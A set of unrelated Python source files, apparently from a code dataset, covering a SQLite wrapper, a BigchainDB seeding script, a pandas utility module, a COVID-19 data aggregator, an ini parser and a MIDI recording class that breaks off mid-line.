__init__(self,database):\n self.conn = lite.connect(database)\n self.cursor = self.conn.cursor()\n\n def close(self):\n self.cursor.close()\n self.conn.commit()\n self.conn.close()\n\n\n def save(self,words):\n for word in words:\n try:\n self.cursor.execute(\"INSERT INTO {0} VALUES (?)\"\n .format(Database.TABLE_NAME),\n [word, ])\n except:\n pass\n\n def getrowid(self,word):\n result = self.cursor.execute(\"SELECT rowid FROM {0} where Word = ?\"\n .format(Database.TABLE_NAME),(word,))\n try:\n rowid = result.__next__()[0]\n except StopIteration:\n rowid = -1\n return rowid\n\n def getsize(self):\n query = \"SELECT Count(*) FROM {0}\".format(\n Database.TABLE_NAME)\n result = self.cursor.execute(query)\n return result.fetchone()[0]\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"423942934","text":"import sys, getopt\n\ndef main(argv):\n if len(argv) > 1:\n raise Exception('too many args!')\n else:\n val = fibonacci(int(argv[0]))\n print(val)\n\ndef fibonacci(n):\n a,b = 1,1\n for i in range(n-1):\n a,b = b, a+b\n return a\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"algo_heights/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"431094699","text":"# flake8: noqa\nimport os\nimport sys\n\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom catalyst import dl\n\nif os.getenv(\"USE_APEX\", \"0\") != \"0\" or os.getenv(\"USE_DDP\", \"0\") != \"0\":\n sys.exit()\n\n\n# sample data\nnum_samples, num_features, num_classes = int(1e4), int(1e1), 4\nX = torch.rand(num_samples, num_features)\ny = (torch.rand(num_samples, num_classes) > 0.5).to(torch.float32)\n\n# pytorch loaders\ndataset = TensorDataset(X, y)\nloader = DataLoader(dataset, batch_size=32, num_workers=1)\nloaders = {\"train\": loader, \"valid\": loader}\n\n# model, criterion, optimizer, scheduler\nmodel = torch.nn.Linear(num_features, num_classes)\ncriterion = torch.nn.BCEWithLogitsLoss()\noptimizer = torch.optim.Adam(model.parameters())\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [2])\n\n# model training\nrunner = dl.SupervisedRunner()\nrunner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n scheduler=scheduler,\n loaders=loaders,\n logdir=\"./logdir\",\n num_epochs=3,\n check=True,\n callbacks=[dl.MultiLabelAccuracyCallback(threshold=0.5)],\n)\n","sub_path":"tests/_tests_scripts/dl_z_mvp_classification2.py","file_name":"dl_z_mvp_classification2.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"265602264","text":"\"\"\"Load some data, fit Discover(), predict on validation data, make some plots, and save the model.\"\"\"\n# %% imports\nimport pandas as pd\nfrom crabnet.data.materials_data import elasticity\nfrom mat_discover.mat_discover_ import Discover\n\n# %% setup\n# set dummy to True for a quicker run --> small dataset, MDS instead of UMAP\ndummy = False\n# set gcv to False for a quicker run --> group-cross validation can take a while\ngcv = False\ndisc = Discover(dummy_run=dummy, device=\"cuda\", target_unit=\"GPa\")\ntrain_df, val_df = disc.data(elasticity, fname=\"train.csv\", dummy=dummy)\ncat_df = pd.concat((train_df, val_df), axis=0)\n\n# %% fit\ndisc.fit(train_df)\n\n# %% predict\nscore = disc.predict(val_df, umap_random_state=42)\n\n# %% leave-one-cluster-out cross-validation\nif gcv:\n disc.group_cross_val(cat_df, umap_random_state=42)\n print(\"scaled test error = \", disc.scaled_error)\n\n# %% plot and save\ndisc.plot()\ndisc.save(dummy=dummy)\n","sub_path":"examples/mat_discover_example.py","file_name":"mat_discover_example.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"407417696","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport embed_video.fields\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('allinone', '0007_feedbacksuggestions'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='new',\n name='Model',\n field=models.IntegerField(choices=[(1, 'ax'), (2, 'videos')], default=1),\n ),\n migrations.AddField(\n model_name='new',\n name='video',\n field=embed_video.fields.EmbedVideoField(default=datetime.datetime(2015, 10, 17, 20, 25, 37, 699355, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='instagramimage',\n name='image',\n field=models.ImageField(upload_to='images/instagramimages/'),\n ),\n ]\n","sub_path":"nasimsite/allinone/migrations/0008_auto_20151017_2025.py","file_name":"0008_auto_20151017_2025.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"52785136","text":"#!/usr/bin/python2\n# -*- coding: utf-8 -*-\n\n'''\n@author:wanglei1\n'''\n\n\nimport json\nimport os\n\n\nclass JsonConf:\n\n '''\n json configs\n '''\n\n @staticmethod\n def store(data, file_name):\n with open(file_name, 'w') as json_file:\n json_file.write(json.dumps(data, indent=4))\n\n @staticmethod\n def load(file_name):\n if not os.path.exists(file_name):\n with open(file_name, 'w') as json_file:\n pass\n with open(file_name) as json_file:\n try:\n data = json.load(json_file)\n except:\n data = {}\n return data\n\n @staticmethod\n def set(data_dict):\n json_obj = JsonConf.load()\n for key in data_dict:\n json_obj[key] = data_dict[key]\n JsonConf.store(json_obj)\n print(json.dumps(json_obj, indent=4))\n\n\nif __name__ == \"__main__\":\n data = {\"a\": \" 1\", \"f\": \"100\", \"b\": \"3000\"}\n file_name = 'configs.json'\n JsonConf.set(data, file_name)","sub_path":"wrapper/utils/config_util.py","file_name":"config_util.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"391333017","text":"\n# 2.1.13 実行順制御\nif 1 > 2:\n message = \"もし1が2よりも大きいとしたら\"\nelif 1 > 3:\n message = \"elifは'else if'を表す\"\nelse:\n message = \"すべての条件に当てはまらなければelseが該当する(なくても良い)\"\n\nx = int(input())\nparity = \"even\" if x % 2 == 0 else \"odd\"\n\nx = 0\nwhile x < 10:\n print(x, \"は、10より小さい\")\n x += 1\n\nfor x in range(10):\n print(x, \"は、10より小さい\")\n\nfor x in range(10):\n if x == 3:\n continue\n if x == 5:\n break\n print(x)\n\n\n# 2.1.14 真偽\none_is_less_than_two = 1 < 2\ntrue_equals_false = (True == False)\n\nx = None\nprint(x == None)\nprint(x is None)\n\n\ndef some_function_that_returns_a_string():\n return \"test is very difficult\"\n\n\ns = some_function_that_returns_a_string()\nif s:\n first_char1 = s[0]\nelse:\n first_char1 = \"\"\n\nfirst_char2 = s and s[0]\n\nsafe_x = x or 0\n\nall([True, 1, {3}])\nall([True, 1, {}])\nany([True, 1, {}])\nall([])\nany([])\n","sub_path":"my_work/chapter2/study_python/if_then_else.py","file_name":"if_then_else.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"44009051","text":"import pandas as pd\nimport copy\nimport numpy as np \nfrom scipy.spatial.distance import euclidean\n\ndef filter_df(df,indexes):\n \"\"\"Returns a dataframe that includes info from indicated indexes\n \n Parameters:\n df: (Pandas DataFrame) The original DataFrame\n indexes: (list of str) The list of indexes\n \"\"\"\n head = df.columns\n data = []\n for i in indexes:\n row = []\n for c in head:\n row.append(df.get_value(i,c))\n data.append(row)\n new_df = pd.DataFrame(data,columns=head)\n new_df.index = indexes\n return new_df\n\ndef redact_df(df,columns):\n \"\"\"Returns a dataframe that includes info from indicated columns\n \n Parameters:\n df: (Pandas DataFrame) The original DataFrame\n indexes: (list of str) The list of column names\n \"\"\"\n ind = df.index\n data = []\n for c in columns:\n vert = list(df[c])\n data.append(vert)\n new_df = pd.DataFrame(data)\n new_df = new_df.transpose()\n new_df.columns = columns\n new_df.index = ind\n return new_df\n\ndef get_certain_mef(df,mef):\n \"\"\"Get certain mef or columns from a df that includes cytosolic, membrane, insoluble data\n\n Parameters:\n df: (Pandas DataFrame) The original DataFrame\n mef: (str) The name of the mef, prefix before _cyt, _mem, _ins\n \"\"\"\n types = ['cyt','mem','ins']\n cs = [mef + '_' + t for t in types]\n return redact_df(df,cs)\n\ndef exp_err_adj(c,m,i,p_c,p_m):\n \"\"\"Experimental error adjustment\n \n Parameters:\n c = (float) Cytosolic experimental value\n m = (float) Membrane experimental value\n i = (float) Insoluble experimental value\n p_c = (float) Proportion of actual cytosolic obtained, between 0 and 1\n p_m = (float) Proportion of actual membrane obtained, between 0 and 1\n \"\"\"\n adj_c = c/p_c\n adj_m = m/p_m + (p_c-1)*adj_c\n adj_i = c + m + i - adj_c - adj_m\n\n return [adj_c,adj_m,adj_i]\n\ndef adj_df(df,mef,p_c,p_m):\n \"\"\"Adjusts the df for experimental extraction error\n \n Parameters:\n df: (Pandas DataFrame) The experimentally derived DataFrame\n mef: (str) The MEF or prefix of columns [with suffix _ins and the like]\n p_c = (float) Proportion of actual cytosolic obtained, between 0 and 1\n p_m = (float) Proportion of actual membrane obtained, between 0 and 1\n \"\"\"\n return_df = copy.deepcopy(df)\n return_df.insert(len(return_df.columns),'cyt',0)\n return_df.insert(len(return_df.columns),'mem',0)\n return_df.insert(len(return_df.columns),'ins',0)\n types = ['cyt','mem','ins']\n cols = [mef + '_' + t for t in types]\n \n for index,row in df.iterrows():\n c = float(row.get_value(cols[0]))\n m = float(row.get_value(cols[1]))\n i = float(row.get_value(cols[2]))\n c,m,i = exp_err_adj(c,m,i,p_c,p_m)\n\n return_df.loc[index,'cyt'] = c\n return_df.loc[index,'mem'] = m\n return_df.loc[index,'ins'] = i\n \n return redact_df(return_df,types)\n \ndef text_to_df(filename,index=None,sep='\\t'):\n \"\"\"Converts a text file that is delimited with first row being header to Pandas DataFrame\n\n Parameters:\n filename: (str) The location of the text file\n index: (str) The column that can be used as an index [Optional]\n sep: (str) The separator used in the file\n\n Returns:\n df: (Pandas Dataframe) The desired dataframe\n \"\"\"\n f = open(filename,'r')\n data = []\n head = []\n for line in f:\n line = line.rstrip()\n if len(head) == 0:\n head = line.split(sep)\n \n else:\n data.append(line.split(sep))\n\n df = pd.DataFrame(data,columns=head)\n if index != None:\n df.index = df[index]\n df.drop(index,1,inplace=True)\n\n return df\n\ndef trieuclid(df1,df2,d3):\n \"\"\"Gets a list of the perimeters of the triangle created by the gene locations of each gene in each of df1,2,3...Returns the list of distances and the ordered list of genes...MUST HAVE THE SAME MEF NAME\n\n Parameters:\n df1: (Pandas Dataframe) The first MEF DataFrame\n df2: (Pandas Dataframe) The second MEF DataFrame\n df3: (Pandas Dataframe) The third MEF DataFrame\n \"\"\"\n genes = list(df1.index)\n mef = df1.columns[0].split('_')[0] + '_' + df1.columns[0].split('_')[1]\n c = 'cyt'\n m = 'mem'\n i = 'ins'\n \n incl_dist = []\n incl_genes = []\n for g in genes:\n vecs = []\n for df in [df1,df2,df3]:\n temp = [df.loc[g,c],df.loc[g,m],df.loc[g,i]]\n temp = [float(item) for item in temp]\n df.append(temp)\n\n if sum(vecs[0]) != 0 and sum(vecs[1]) != 0 and sum(vecs[2]) != 0:\n v1 = vecs[0]\n v2 = vecs[1]\n v3 = vecs[2]\n incl_dist.append(euclidean(v1,v2)+euclidean(v1,v3)+euclidean(v2,v3))\n incl_genes.append(g)\n \n return incl_dist,incl_genes\n","sub_path":"basic_tools/basic_tools.py","file_name":"basic_tools.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"56865196","text":"import random\nimport logging\nimport os.path\n\nimport bigchaindb\nimport bigchaindb.config_utils\n\nfrom server.lib.models.accounts import Account\nfrom server.lib.models.assets import create_asset\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ntry:\n CONFIG_FILE = os.environ['BIGCHAINDB_CONFIG']\nexcept KeyError:\n CONFIG_FILE = os.path.join(os.path.dirname(__file__), '.bigchaindb_examples')\n\nAPPS = [\n {\n 'name': 'ontherecord',\n 'num_accounts': 3,\n 'num_assets': 0,\n 'payload_func': (\n lambda x: {\n 'app': 'ontherecord',\n 'content': x\n }\n )\n },\n {\n 'name': 'sharetrader',\n 'num_accounts': 3,\n 'num_assets': 64,\n 'payload_func': (\n lambda i: {\n 'app': 'sharetrader',\n 'content': {\n 'x': int(i / 8),\n 'y': int(i % 8)\n }\n }\n )\n },\n {\n 'name': 'interledger',\n 'num_accounts': 3,\n 'num_assets': 0,\n 'payload_func': (\n lambda x: {\n 'app': 'interledger',\n 'content': x\n }\n )\n }\n]\n\n\ndef get_bigchain(conf=CONFIG_FILE):\n if os.path.isfile(conf):\n bigchaindb.config_utils.autoconfigure(filename=conf, force=True)\n\n return bigchaindb.Bigchain()\n\nbigchain = get_bigchain()\nlogging.info('INIT: bigchain initialized with database: {}'.format(bigchaindb.config['database']['name']))\n\n\ndef main():\n\n for app in APPS:\n accounts = []\n for i in range(app['num_accounts']):\n account = Account(bigchain=bigchain,\n name='account_{}'.format(i),\n db=app['name'])\n accounts.append(account)\n\n logging.info('INIT: {} accounts initialized for app: {}'.format(len(accounts), app['name']))\n\n assets = []\n for i in range(app['num_assets']):\n asset = create_asset(bigchain=bigchain,\n to=accounts[random.randint(0, app['num_accounts'] - 1)].vk,\n payload=app['payload_func'](i))\n assets.append(asset)\n logging.info('INIT: {} assets initialized for app: {}'.format(len(assets), app['name']))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"141723439","text":"#!/bin/python\n\nimport json\nimport csv\nimport os\nimport datetime\nimport collections\nfrom copy import deepcopy\n\nclass DataHandler():\n def __init__(self, patients_csvfile=None, data_summary_csvfile=None, total_sickbeds=None):\n datetime_now = datetime.datetime.now()\n self.datetime_now_str = datetime_now.strftime(\"%Y/%m/%d %H:%M\")\n\n self.start_date = None\n self.end_date = datetime_now if datetime_now.hour >= 22 else \\\n datetime_now - datetime.timedelta(days=1)\n\n self.patients_csvfile = patients_csvfile\n self.patients_data = self.__import_patients_data()\n\n self.data_summary_csvfile = data_summary_csvfile\n self.data_summary = self.__import_data_summary()\n\n self.total_patients = None\n self.total_discharges = None\n self.total_deaths = None\n self.current_inpatients = None\n self.total_sickbeds = total_sickbeds\n self.__classfy_data_summary()\n\n self.data = {\n \"patients\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"patients_summary\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"inspections_summary\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"age\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"sickbeds_summary\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"main_summary\": {},\n \"querents\": {\n \"date\": self.datetime_now_str,\n \"data\": {}\n },\n \"lastUpdate\": self.datetime_now_str\n }\n\n def generate_data(self):\n self.data[\"patients\"][\"data\"] = self.generate_patients()\n self.data[\"patients_summary\"][\"data\"] = self.generate_patients_summary_by_date()\n self.data[\"age\"][\"data\"] = self.generate_patients_summary_by_age()\n self.data[\"inspections_summary\"][\"data\"] = self.generate_inspections_summary()\n self.data[\"sickbeds_summary\"][\"data\"] = self.generate_sickbeds_summary()\n self.data[\"main_summary\"] = self.generate_main_summary()\n self.data[\"querents\"][\"data\"] = self.generate_querents()\n\n return self.data\n\n def generate_patients(self):\n patients = []\n for d in self.patients_data:\n p = {\n \"リリース日\": d[\"公表_年月日\"].strftime(\"%Y-%m-%d\") + \"T08:00:00\",\n \"居住地\": d[\"居住地\"],\n \"年代\": d[\"年代\"],\n \"性別\": d[\"性別\"],\n \"退院\": d[\"退院済フラグ\"],\n \"date\": d[\"公表_年月日\"].strftime(\"%Y-%m-%d\")\n }\n patients.append(p)\n\n return patients\n\n def generate_patients_summary_by_date(self):\n summary_by_date = self.__summarize_data(self.patients_data, \"公表_年月日\")\n patients_summary_by_date = self.__fill_in_zero_value_at_non_exists_date(\n summary_by_date)\n\n patients_summary = []\n for date, total in patients_summary_by_date.items():\n p = {\n \"日付\": date.strftime(\"%Y-%m-%d\"),\n \"小計\": total,\n }\n patients_summary.append(p)\n\n return patients_summary\n\n def generate_patients_summary_by_age(self):\n summary_by_age = self.__summarize_data(self.patients_data, \"年代\")\n null_data = {\"10代未満\": 0}\n for i in range(10, 110, 10):\n null_data[str(i) + \"代\"] = 0\n\n d = self.__deepmerge(null_data, summary_by_age)\n patients_summary_by_age = {\n \"10代以下\": d[\"10代\"] + d[\"10代未満\"],\n \"20代〜30代\": d[\"20代\"] + d[\"30代\"],\n \"40代〜50代\": d[\"40代\"] + d[\"50代\"],\n \"60代���70代\": d[\"60代\"] + d[\"70代\"],\n \"80代以上\": d[\"80代\"] + d[\"90代\"] + d[\"100代\"],\n }\n\n return patients_summary_by_age\n\n def generate_inspections_summary(self):\n inspections_summary = []\n for d in self.data_summary:\n if d[\"日付\"] <= self.end_date:\n p = {\n \"日付\": d[\"日付\"].strftime(\"%Y-%m-%d\"),\n \"小計\": d[\"検査実施件数\"]\n }\n inspections_summary.append(p)\n\n return inspections_summary\n\n def generate_sickbeds_summary(self):\n sickbeds_summary = {\n \"入院患者数\": self.current_inpatients,\n \"病床数\": self.total_sickbeds - self.current_inpatients\n }\n\n return sickbeds_summary\n\n def generate_main_summary(self):\n main_summary = {\n \"date\": self.datetime_now_str,\n \"attr\": \"累計\",\n \"value\": self.total_patients,\n \"children\": [\n {\"attr\": \"入院中\", \"value\": self.current_inpatients},\n {\"attr\": \"死亡\", \"value\": self.total_deaths},\n {\"attr\": \"退院\", \"value\": self.total_discharges},\n ]\n }\n\n return main_summary\n\n def generate_querents(self):\n querents = []\n for d in self.data_summary:\n if d[\"相談窓口相談件数\"] is not None:\n q = {\n \"日付\": d[\"日付\"].strftime(\"%Y-%m-%d\"),\n \"小計\": d[\"相談窓口相談件数\"]\n }\n querents.append(q)\n\n return querents\n\n def __import_patients_data(self):\n # 公表_年月日が空の場合はfilterする\n patients_data = list(filter(\n lambda x: len(x[\"公表_年月日\"]) != 0,\n self.__load_csvfile(self.patients_csvfile)\n ))\n\n for d in patients_data:\n d[\"公表_年月日\"] = datetime.datetime.strptime(d[\"公表_年月日\"], '%Y/%m/%d')\n\n return patients_data\n\n def __import_data_summary(self):\n data_summary = self.__load_csvfile(self.data_summary_csvfile)\n for d in data_summary:\n d[\"日付\"] = datetime.datetime.strptime(\n d[\"日付\"], \"%m月%d日\").replace(year=2020)\n d[\"検査実施件数\"] = int(d[\"検査実施件数\"] or 0)\n d[\"うち陽性\"] = int(d[\"うち陽性\"] or 0)\n d[\"相談窓口相談件数\"] = int(\n d[\"相談窓口相談件数\"]) if len(\n d[\"相談窓口相談件数\"]) != 0 else None\n d[\"退院\"] = int(d[\"退院\"] or 0)\n d[\"死亡\"] = int(d[\"死亡\"] or 0)\n\n start_date = data_summary[-1][\"日付\"] + datetime.timedelta(days=1)\n for date in self.__daterange(start_date, self.end_date):\n data_summary.append({\n \"日付\": date,\n \"検査実施件数\": 0,\n \"うち陽性\": 0,\n \"相談窓口相談件数\": None,\n \"退院\": 0,\n \"死亡\": 0\n })\n\n return data_summary\n\n def __load_csvfile(self, csvfile, encoding='utf_8_sig'):\n json_list = []\n with open(csvfile, 'r', encoding=encoding) as f:\n for row in csv.DictReader(f):\n json_list.append(row)\n\n return json.loads(json.dumps(json_list))\n\n def __summarize_data(self, data, key):\n counter = [d[key] for d in data]\n summary = {}\n for val, total in collections.Counter(counter).items():\n summary[val] = total\n\n return summary\n\n def __fill_in_zero_value_at_non_exists_date(self, summary_by_date):\n start_date = list(summary_by_date.keys())[0]\n null_date = dict.fromkeys(\n self.__daterange(\n start_date, self.end_date), 0)\n\n return self.__deepmerge(null_date, summary_by_date)\n\n def __classfy_data_summary(self):\n self.total_patients = sum([d[\"うち陽性\"] for d in self.data_summary])\n self.total_discharges = sum([d[\"退院\"] for d in self.data_summary])\n self.total_deaths = sum([d[\"死亡\"] for d in self.data_summary])\n\n self.current_inpatients = self.total_patients - \\\n self.total_discharges - self.total_deaths\n\n def __deepmerge(self, src, update):\n result = deepcopy(src)\n for k, v in update.items():\n if k in result and isinstance(result[k], dict):\n result[k] = self.__deepmerge(result[k], v)\n else:\n result[k] = deepcopy(v)\n return result\n\n def __daterange(self, start_date, end_date):\n for n in range((end_date - start_date).days + 1):\n yield start_date + datetime.timedelta(n)\n\n","sub_path":"tool/convert/modules/DataHandler.py","file_name":"DataHandler.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"568583316","text":"\"\"\"\nfrom: https://bitbucket.org/maascamp/pyconfigini/src/f2b0f95b53d5/pyconfigini.py?at=default\n\nAn .ini file parser that follows the same rules as Zend_Config_Ini\n(see http://framework.zend.com/manual/en/zend.config.adapters.ini.html\nfor details) with the exception that the comment character is '#'\ninstead of ';'.\n\nValues are converted to Python types where possible and returned as \nstrings otherwise (i.e. 834 will convert to an int, but /some/path\nwill convert to a string).\n\nLines beginning with '#' are treated as comments and will be ignored.\n\"\"\"\nimport re\nfrom collections import OrderedDict\nfrom copy import deepcopy\nfrom ast import literal_eval\n\n__all__ = ['parse_ini']\n\ndefault = '__default__'\n\nreg_sec = re.compile('\\[\\s?([\\w]+)\\s?\\]', re.IGNORECASE)\nreg_isec = re.compile('\\[\\s?([\\w]+)\\s?:\\s?([\\w]+)\\s?\\]', re.IGNORECASE)\n\ndef parse_ini(ini_path, env=None):\n \n ini = _Obj({default: _Obj()})\n current_section = default\n with open(ini_path) as f:\n for line in f:\n line = line.strip()\n if not line or line.isspace() or line[0] == '#': continue\n if line[0] == '[':\n res = reg_sec.search(line)\n if res is not None:\n section = res.group(1)\n ini[section] = deepcopy(ini[default])\n else:\n res = reg_isec.search(line)\n if res is None:\n raise SyntaxError('Invalid section declaration.')\n section = res.group(1)\n parent = res.group(2)\n if parent not in ini:\n raise MissingSectionError(\"'%s' inherits from '%s' which hasn't been declared.\" % (section, parent))\n ini[section] = deepcopy(ini[parent])\n current_section = section\n else:\n pieces = line.split('=', 1)\n vals = pieces[0].strip().split('.')\n vals.reverse()\n data = _cast(pieces[1].strip())\n working_obj = ini[current_section]\n while vals:\n if len(vals) == 1:\n working_obj[vals.pop()] = data\n else:\n val = vals.pop()\n if val not in working_obj:\n working_obj[val] = _Obj()\n working_obj = working_obj[val]\n \n if env is not None:\n if env not in ini:\n raise MissingSectionError('The section being loaded does not exist.')\n return ini[env]\n return ini\n\ndef _cast(val):\n try:\n val = literal_eval(val)\n except:\n pass\n return val\n \nclass _Obj(OrderedDict):\n \"\"\" A dict that allows for object-like property access syntax.\n \"\"\"\n def __copy__(self):\n data = self.__dict__.copy()\n return _Obj(data)\n \n def __getattr__(self, name):\n try:\n return self[name]\n except KeyError:\n try:\n return self[default][name]\n except KeyError:\n raise AttributeError(name)\n\nclass MissingSectionError(Exception):\n \"\"\" Thrown when a section header inherits from a section\n that has yet been undeclared.\n \"\"\"","sub_path":"mamba/config/pyconfigini.py","file_name":"pyconfigini.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"391952573","text":"from __future__ import print_function\r\n\r\nimport os\r\nimport sys\r\nimport mido\r\nimport time\r\nimport math\r\nimport datetime\r\nimport threading\r\nimport collections\r\nimport MusicTheory\r\n\r\n\r\nclass RecordMidi : \r\n\r\n def __init__ ( self ) : \r\n self.messagesFromMidiInstrument = {} \r\n self.midiMessagesNoOverlaps = {} \r\n self.midiMessages = {} \r\n self.initialClk = 0\r\n self.phraseLength = 4\r\n \r\n\r\n\r\n self.tsInfo = { 'tsNumerator': 4, 'tsDenominator': 4, 'measureLength': 1920, 'resolution': 480, 'format':0 , 'bpm': 120 } \r\n\r\n self.oneBeatInSeconds = 60.0 / self.tsInfo['bpm'] \r\n self.oneBeatInMilliSeconds = round ( self.oneBeatInSeconds*1000, 3 ) \r\n \r\n\r\n self.quarterNoteInBeats = float ( ( (1/4.0) ) / (1.0/self.tsInfo['tsDenominator']) ) \r\n self.quarterNoteInSeconds = self.quarterNoteInBeats * self.oneBeatInSeconds \r\n self.quarterNoteInMilliSeconds = round ( self.quarterNoteInSeconds*1000, 3 ) \r\n\r\n # resolution = ppq = pulses per quarter note = ticks per quarter note\r\n self.oneTickInSeconds = round ( ( self.quarterNoteInSeconds / 480 ) , 7 )\r\n self.oneTickInMilliSeconds = round ( self.oneTickInSeconds*1000, 3 ) \r\n \r\n print ( \"1 Tick in Seconds: \", self.oneTickInSeconds ) \r\n print ( \"1 Tick in Milli Seconds: \", self.oneTickInMilliSeconds ) \r\n\r\n\r\n self.oneSecondInTicks = round ( 1.0/self.oneTickInSeconds, 0 ) \r\n self.oneMilliSecondInTicks = round ((1.0/self.oneTickInMilliSeconds), 2 ) \r\n\r\n\r\n print ( \"1 Second in Ticks: \", self.oneSecondInTicks ) \r\n print ( \"1 Milli Seconds in Ticks: \", self.oneMilliSecondInTicks ) \r\n \r\n self.ticksForPhraseLength = self.tsInfo['measureLength'] * self.phraseLength\r\n self.secondsForPhraseLength = int ( self.ticksForPhraseLength * self.oneTickInSeconds )\r\n \r\n print ( \"Phrase Length: \", self.phraseLength, \"Num Seconds for Phrase: \", self.secondsForPhraseLength ) \r\n\r\n #sys.exit(0) \r\n\r\n\r\n def run ( self ) : \r\n print ( \"Initial Clock: \", self.initialClk ) \r\n \r\n\r\n mido.set_backend('mido.backends.rtmidi')\r\n inport = mido.open_input()\r\n\r\n print ( \"Time: \", time.time() ) \r\n\r\n\r\n try:\r\n initialNotePlayed = False\r\n numNotes = 0 \r\n endRecording = False\r\n with mido.open_input() as port:\r\n print('Using {}'.format(port))\r\n\r\n print(\"Initial Clk: \", self.initialClk, \"Waiting for messages...\" ) \r\n \r\n for message in port:\r\n\r\n if ( not initialNotePlayed and message.type == 'note_on' ) : \r\n initialNotePlayed = True \r\n self.initialClk = message.time\r\n print ( \"\\nStarted Recording\" ) \r\n print(\"First Note Played, Initial Clk: \", self.initialClk ) \r\n\r\n if ( message.time - self.initialClk >= self.secondsForPhraseLength ) :\r\n print ( \"Initial Clk: \", self.initialClk, \"Current Time: \", message.time, self.phraseLength, \"measures recorded: \", \"Number of seconds recorded: \", self.secondsForPhraseLength, \"Stop Recording\" ) \r\n endRecording = True\r\n break \r\n\r\n\r\n print ( message ) \r\n if ( message.type == 'note_on' or message.type == 'note_off' ) : \r\n if ( message.velocity == 0 ) : \r\n self.messagesFromMidiInstrument[numNotes] = { 'event': 'note_off', 'pitch': message.note, 'time': message.time, 'velocity': message.velocity }\r\n else :\r\n self.messagesFromMidiInstrument[numNotes] = { 'event': message.type, 'pitch': message.note, 'time': message.time, 'velocity': message.velocity }\r\n numNotes += 1\r\n \r\n\r\n\r\n\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n for note in self.messagesFromMidiInstrument : \r\n self.messagesFromMidiInstrument[note]['time'] = round ( self.messagesFromMidiInstrument[note]['time'] - self.initialClk , 4 ) \r\n self.messagesFromMidiInstrument[note]['starttick'] = round ( self.messagesFromMidiInstrument[note]['time'] * self.oneSecondInTicks, 0 ) \r\n\r\n print ( note, self.messagesFromMidiInstrument[note] ) \r\n\r\n \r\n #generate start and end times in ticks\r\n self.generateStartAndEndTimes() \r\n\r\n #quantize notes\r\n sixteenth = 120\r\n eighth = 240\r\n self.selfQuantizeNotes ( eighth ) \r\n self.selfQuantizeNotes ( sixteenth ) \r\n\r\n #remove overlaps\r\n self.removeOverlaps () \r\n\r\n # create Midi\r\n self.createMidi () \r\n\r\n def removeOverlaps ( self ) : \r\n \r\n\r\n length = len(self.midiMessages) \r\n overlappedIndex = [] \r\n\r\n for note in self.midiMessages : \r\n \r\n s1 = self.midiMessages[note]['starttick'] \r\n actualDuration = self.midiMessages[note]['duration'] * ( self.midiMessages[note]['velocity'] / 127.0 ) \r\n e1 = self.midiMessages[note]['starttick'] + actualDuration\r\n\r\n for nextNote in range ( note+1, length, 1 ) : \r\n\r\n s2 = self.midiMessages[nextNote]['starttick'] \r\n actualDuration = self.midiMessages[nextNote]['duration'] * ( self.midiMessages[nextNote]['velocity'] / 127.0 ) \r\n e2 = self.midiMessages[nextNote]['starttick'] + actualDuration\r\n \r\n \r\n if ( s1 <= e2 and e1 >= s2 ) : # overlap exists\r\n overlappedIndex.append ( nextNote ) \r\n \r\n \r\n overlappedIndex = list(set( overlappedIndex ) ) \r\n print() \r\n print ( \"Overlapped Index: \", overlappedIndex ) \r\n\r\n for index in sorted(overlappedIndex, reverse=True):\r\n del self.midiMessages[index]\r\n\r\n print ( \"Midi Messages after removing overlap\" ) \r\n \r\n for note in self.midiMessages : \r\n print ( note, self.midiMessages[note]['pitch'], self.midiMessages[note]['starttick'], self.midiMessages[note]['endtick'], self.midiMessages[note]['velocity'], \r\n self.midiMessages[note]['duration'], self.midiMessages[note]['measure'] )\r\n \r\n\r\n\r\n def selfQuantizeNotes ( self, ticksForQuantization ) : \r\n \r\n for note in self.midiMessages : \r\n\r\n div = self.midiMessages[note]['starttick'] // ticksForQuantization\r\n mod = 